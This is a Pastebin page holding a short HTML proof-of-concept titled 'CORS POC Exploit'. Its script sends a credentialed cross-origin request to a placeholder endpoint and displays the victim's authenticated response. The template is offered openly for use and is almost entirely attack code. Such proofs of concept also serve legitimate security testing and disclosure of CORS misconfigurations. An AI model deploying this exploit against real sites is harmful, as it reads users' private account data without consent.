Guest User

Untitled

a guest
Jun 30th, 2017
1,019
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE html>
  2. <html>
  3. <body>
  4. <center>
  5. <h2>CORS POC Exploit</h2>
  6.  
  7. <div id="demo">
  8. <button type="button" onclick="cors()">Exploit</button>
  9. </div>
  10.  
  11. <script>
  12. function cors() {
  13. var xhttp = new XMLHttpRequest();
  14. xhttp.onreadystatechange = function() {
  15. if (this.readyState == 4 && this.status == 200) {
  16. document.getElementById("demo").innerHTML = this.responseText;
  17. }
  18. };
  19. xhttp.open("GET", "YOUR_ENDPOINT GOES HERE", true);
  20. xhttp.withCredentials = true;
  21. xhttp.send();
  22. }
  23. </script>
  24.  
  25. </body>
  26. </html>
RAW Paste Data